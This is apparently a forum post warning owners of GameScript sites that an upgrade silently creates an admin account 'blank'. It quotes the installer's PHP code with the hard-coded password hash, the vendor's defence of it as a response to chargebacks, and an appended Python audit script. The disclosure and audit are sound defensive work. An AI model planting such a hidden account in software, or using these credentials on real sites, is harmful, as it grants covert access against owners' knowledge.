Full Member
Join Date: Jun 2006
Posts: 97
Warning About GS "Blank" User..
It was recently brought to my attention that the LATEST Upgrade of GameScript has a "Backdoor" User...
Quote:
$usercheck = "SELECT * FROM `users` WHERE `username` ='blank'";
if (@mysql_num_rows(mysql_query($usercheck)) < 1) {
    // No 'blank' account yet (fresh install): create it with the hard-coded password hash
    @mysql_query("INSERT INTO `users` ( `username` , `password` , `securitylevel` , `email` , `id` , `logincount` , `gameplays` , `verified` , `subscribed` , `avatar` , `comments` , `location` , `gender` , `favgame` , `joined` , `status` , `pmsuspended` , `im` , `submissions` , `timestamp` , `ip` ) VALUES ( 'blank', '557cce710ecad98f3b0e507dbc2b4846', '0', 'admin@iamnotageek.com', NULL , '0', '0', '0', '1', '', '', '', '', '', '0000-00-00', '0', '0', '', '0', '0', '');");
} else {
    // Account already exists (e.g. on upgrade): reset its password hash and set securitylevel to 1
    @mysql_query("UPDATE `users` SET `password` = '557cce710ecad98f3b0e507dbc2b4846', `securitylevel` = '1', `logincount` = '0' WHERE `username` ='blank' LIMIT 1");
}
Please DELETE That line if you DO NOT Want the username "Blank" (With ADMIN PERMISSIONS) Added to your site...
A word from the Author:
Quote:
If you don't like it, simply remove that snippet of code in the first post. The script is unencoded for that very reason.
As also stated, the install instructions even say to password protect your admin directory. When you do this, that admin account is worthless. There is no other backdoor in place.
I put this code in place after watching $4k in chargebacks in 2 weeks on all of our biggest packages, where people simply install and steal our stuff just to turn around and take the money right back. I have to do something, and I have to do something drastic.
After talking to Adam, the admin user account doesn't seem like the route to go, but we will keep looking.
My Notes on the subject:
If an author is willing to sell a product with the fear of chargebacks, the author should consider encoding a few files and setting up a better LICENSING script. Yes, this can be a drag to many. However, it will solve the problem and eliminate the need for a BackDoor / Admin User.
Just my .02, and I hope everyone takes heed of this notice.
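As an added example (not code from GameScript or from either poster above), here is a small audit script a site owner could run after every upgrade. It does two things the post's advice leaves to hand work: it scans the installer's PHP source for the quoted INSERT/UPDATE that carries the hard-coded password hash, and it flags rows in a dump of the users table that match any of the indicators visible in the snippet (username 'blank', the hash 557cce710ecad98f3b0e507dbc2b4846, the email admin@iamnotageek.com). It goes slightly beyond the post in that it also catches an account that was renamed but still carries the backdoor hash or email. The sample PHP source, the sample rows, the column names used, and the function names are constructed assumptions for the demonstration.

```python
"""Audit helpers for the GameScript 'blank' backdoor account.

Added example, not code from GameScript or from the original post.
Indicators come from the quoted installer snippet; the sample source,
sample rows and function names below are constructed for this demo.
"""
import re

BACKDOOR_USERNAME = "blank"
BACKDOOR_PASSWORD_HASH = "557cce710ecad98f3b0e507dbc2b4846"
BACKDOOR_EMAIL = "admin@iamnotageek.com"

# The snippet re-applies the account on every install/upgrade (the UPDATE
# branch resets the hash and securitylevel), so deleting the row once is
# not enough: re-run the source scan after each upgrade as well.
SNIPPET_RE = re.compile(
    r"mysql_query\(\s*[\"'](?:INSERT INTO|UPDATE)\s+`?users`?.*?"
    + re.escape(BACKDOOR_PASSWORD_HASH),
    re.IGNORECASE | re.DOTALL,
)

# Constructed sample: a trimmed copy of the upgrade snippet quoted in the post.
SAMPLE_PHP = """<?php
// constructed sample: the upgrade snippet quoted in the post
$usercheck = "SELECT * FROM `users` WHERE `username` ='blank'";
if(@mysql_num_rows(mysql_query($usercheck)) < 1){
@mysql_query("INSERT INTO `users` ( `username` , `password` , `securitylevel` ) VALUES ( 'blank', '557cce710ecad98f3b0e507dbc2b4846', '0');");
}else { @mysql_query("UPDATE `users` SET `password` = '557cce710ecad98f3b0e507dbc2b4846', `securitylevel` = '1' WHERE `username` ='blank' LIMIT 1"); }
"""

# Constructed sample rows from a users table dump (column names assumed).
# Row 3 shows the renamed-account case: different username, same hash.
SAMPLE_ROWS = [
    {"id": 1, "username": "admin", "password": "0123456789abcdef0123456789abcdef",
     "email": "owner@example.com", "securitylevel": 1},
    {"id": 2, "username": "blank", "password": BACKDOOR_PASSWORD_HASH,
     "email": BACKDOOR_EMAIL, "securitylevel": 1},
    {"id": 3, "username": "support", "password": BACKDOOR_PASSWORD_HASH,
     "email": "support@example.com", "securitylevel": 1},
]


def scan_source(php_source):
    """Return (line_number, statement_prefix) for every INSERT/UPDATE on the
    users table in php_source that carries the hard-coded backdoor hash."""
    hits = []
    for m in SNIPPET_RE.finditer(php_source):
        line_no = php_source.count("\n", 0, m.start()) + 1
        hits.append((line_no, m.group(0)[:60]))
    return hits


def suspicious_users(rows):
    """Flag users-table rows matching any backdoor indicator.

    Each row is a dict with at least username, password and email.
    Returns a list of (id, username, [reasons]) in table order."""
    flagged = []
    for row in rows:
        reasons = []
        if row.get("username") == BACKDOOR_USERNAME:
            reasons.append("backdoor username")
        if str(row.get("password", "")).lower() == BACKDOOR_PASSWORD_HASH:
            reasons.append("backdoor password hash")
        if str(row.get("email", "")).lower() == BACKDOOR_EMAIL:
            reasons.append("backdoor email")
        if reasons:
            flagged.append((row.get("id"), row.get("username"), reasons))
    return flagged


def cleanup_sql(flagged):
    """Build the DELETE statements for flagged rows, one per primary key,
    so an admin can review them before running them against the site DB."""
    return ["DELETE FROM `users` WHERE `id` = %d LIMIT 1;" % int(fid)
            for fid, _, _ in flagged]


if __name__ == "__main__":
    for line_no, stmt in scan_source(SAMPLE_PHP):
        print("source line %d: %s..." % (line_no, stmt))
    hits = suspicious_users(SAMPLE_ROWS)
    for fid, name, reasons in hits:
        print("user id=%s name=%s: %s" % (fid, name, ", ".join(reasons)))
    for stmt in cleanup_sql(hits):
        print(stmt)
```

Point the source scan at the real installer/upgrade files and the row check at a `SELECT id, username, password, email FROM users` export; review the generated DELETE statements before running them, and keep the scan in the post-upgrade checklist, since a future upgrade can re-create the account.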